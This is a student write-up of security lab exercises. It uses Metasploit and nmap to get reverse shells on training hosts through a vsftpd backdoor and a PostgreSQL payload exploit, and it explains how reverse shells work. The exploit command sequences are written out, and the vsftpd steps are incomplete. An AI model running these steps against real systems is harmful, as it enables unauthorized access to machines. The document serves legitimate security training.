Write-up to the Metasploit Reverse Shell

Metasploit Reverse Shell on localhost

Task

A reverse shell is to be created on Kali. So attacker and victim is localhost.

Implementation

We use Metasploit for this purpose. Msfvenom belongs to Metasploit and is a payload generator and encoder. The documentation can be found at offensive-security.

You get a list of payloads with it:

msfvenom -l payloads

We use in the exercise the “linux/x86/meterpreterreverse_tcp” which creates a reverse shell, which connects to the Attacker.

Questions

How does a reverse shell work? Who opens the TCP connection and to which IP / port?

The attacker/server listens on port 8080 to its own IP and the victim/client connects to it. In other words, the victim opens a shell and then asks the attacker (who listens on port 8080) to connect. With ssh it is the other way around. The server listens to port 22 and opens the shell when the client connects.

Who opens the shell? Who controls it? Which computer executes the commandos entered?

The victim opens the shell and the attacker controls it. The shell is at the victim’s and the commands are executed there as well.

Reverse Shell via vsftpd Exploit

Task

Metasploit is supposed to be used to exploit a vulnerability.

Implementation

First, I scan for open ports and find the associated services. Then I try to find a vulnerability for a service, which can then be used to create a shell.

The first part, can be done with nmap.

nmap -v --script vuln iloveshells.vm.vuln.land

As a result, you get many MitM possibilities but also a vulnerability concerning ftp-vsftpd-backdoor.

We exploit these as follows:

msfconsole
search vsftpd
options
set RHOSTS = iloveshells.vm.vuln.land

Afterwards we are already on the victim.

Reverse Shell via Postgresql Exploit

Task

We are supposed to get access to a system that was not meant to be online.

Implementation

nmap -sV 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land
msfconsole
set RHOSTS 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land
set RPORT 8181
use exploit/linux/postgres/postgres_payload

run

You now have a shell and can do what you need to do.

Good to know

  • Nessus does not find everything
  • Tools rely on conventions like port 5432
  • If something is not default, you have to collect information yourself -> nmap Portscan and Service detection
  • The nmap script scan nmap -v --script vuln did not detect the 8181 port as Postgresql. The vuln is a category and it would be better to use the right script and define the port with -p. to define the port.
Previous
Next